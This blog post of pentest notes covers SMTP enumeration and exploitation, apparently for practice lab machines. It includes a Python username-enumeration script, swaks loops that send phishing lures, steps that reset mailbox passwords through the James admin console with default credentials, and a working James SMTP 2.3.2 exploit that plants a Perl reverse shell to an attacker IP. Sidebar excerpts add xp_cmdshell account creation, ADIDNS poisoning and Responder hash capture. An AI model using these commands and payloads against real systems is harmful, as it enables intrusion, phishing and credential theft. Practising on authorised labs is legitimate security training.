Skip to main content

SMTP - Port 25 Enumeration

By 


Basic info About SMTP Commands

PIPELINING – Pipelining Sends batches of SMTP commands without waiting for a response from the SMTP Server to individual comments.
SIZE – SIZE extension has two purposes:
    To give the server an estimate of the size of a message before the message is transmitted.
    To warn the client that messages above a certain size will not be accepted.
ETRN – allows an SMTP server to send a request to another SMTP server to send any e-mail messages it has. The ETRN command has been specifically designed to allow integration with dial-up mail servers.
8BITMIME – is a way for SMTP servers that support it to transmit email using 8-bit character sets in a standards-compliant way that won’t break old servers.
DSN – DSN (Delivery Status Notification) is an extension to SMTP email delivery that can notify senders about the status of their message’s delivery.
STARTTLS –  StartTLS is mainly used as a protocol extension for communication by e-mail, based on the protocols SMTP, IMAP, and POP. In order to encrypt the information transmitted.

SMTP User Enum

smtp-user-enum -U /usr/share/SecLists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D DOMAIN.com -t 10.10.10.10 -m 50 -M RCPT

Commonly used smtp names
SMTP Enum via NC/Telnet

nc -nv 10.10.10.10 25
EHLO domain.com



SMTP User Enum Script

import sys
import socket
import threading
 
ip = '10.13.38.12'
domain = 'EXCHANGE.HTB.LOCAL'
mail_from = 'morph3@ecorp.com'
n_threads = 50
m_list = []
t_list = []
 
if (len(sys.argv) < 2):
    print("python smtp_user_enum.py wordlist.txt")
    sys.exit(1)
 
fn = sys.argv[1]
f = open(fn,"r")
[m_list.append(m.replace("\n","")) for m in f]
m_list.reverse()
 
def send_mail():
    while True:
        try:
            print len(m_list)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, 25))
            r = s.recv(1024)
            s.send(("HELO {}\r\n".format(domain)).encode())
            r = s.recv(1024)
            s.send(("MAIL FROM: {}\r\n".format(mail_from)).encode())
            r = s.recv(1024)
            x = m_list.pop()
            s.send("RCPT TO: {}@humongousretail.com\r\n".format(x))
            r = s.recv(1024)
            r = r.decode()
            if "550" not in r:
                print x
        except IndexError:
            sys.exit(1)
    return 
 
for t in range(n_threads):
    t = threading.Thread(target=send_mail,)
    t_list.append(t)
    t.daemon = True
    t.start()
 
for t in t_list:
    try:  
        t.join()
    except KeyboardInterrupt:
        sys.exit(1)
 Send Email to Multiple Emails 

 while read mail; do swaks --to $mail --from it@Bhanu.notes --header “Subject: Testing the below url” --body " open this url dude http://10.10.14.63/ " --server 10.10.10.10; done < mail.txt 
Send Email via SMTP 

swaks --to sales@domain.com --from it@domain.com --header "Subject: Credentials / Errors" --body "website_name http://10.10.10.10/" --server domain.com
Send an email via SMTP TO users 

telnet 10.10.10.10 25 

MAIL FROM: IT@company.com
RCPT TO: user@company.com
DATA
yo, please click on my reverse shell, so that i can hack you at http://10.10.10.10/
.
quit
If you have email and Credentials --> login using Evolution tool

evolution

A service running SMTP - Simple Mail Transfer Protocol looks like this

Port - 25,110 and someother UDP ports (4555) should be open for proper enum

 

As it was saying Admin panel on 4555 lets take a look at it. 

use telnet for better response . 

telnet IP_ADDRESS 4555

try default login creds - root/root

help     /View commands 

adduser  /add a new user 

listusers /list all users


lets reset the users passwords 

telnet IP_ADDRESS 4555

setpassword user password        /reset the password, later we can read mails with these creds

View Emails from SMTP Server

telnet IP_ADDRESS 110 

USER john
PASS john

LIST       /list the received emails

OK 0 0      /if you see anything other than "0" --> there should be an email for them

RETR 1     /View the first mail


Exploiting James SMTP Server 2.3.2 


creating an user:
telnet IP_ADDRESS 4555
root  /username
root  /pass
adduser ../../../../../../../../etc/bash_completion.d password


sending a mail:
----------------
telnet ip_address 25
EHLO someone@mydomain
MAIL FROM: <'@mydomain>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
FROM: someone@mydomain
'
perl -e 'use Socket;$i="KALI_IP";$p=9007;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
.
quit


Gaining the Shell:

nc -nvlp 9007        /Will get a shell right after we login to SSH

ssh user@IP_ADDRESS 

if you get a  limited shell, try gaining one more reverse shell to another terminal and 
try it.
Labels:

Comments

  1. AnonymousApril 20, 2022 at 1:37 AM

    Smtp - Port 25 Enumeration >>>>> Download Now

    >>>>> Download Full

    Smtp - Port 25 Enumeration >>>>> Download LINK

    >>>>> Download Now

    Smtp - Port 25 Enumeration >>>>> Download Full

    >>>>> Download LINK A2

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more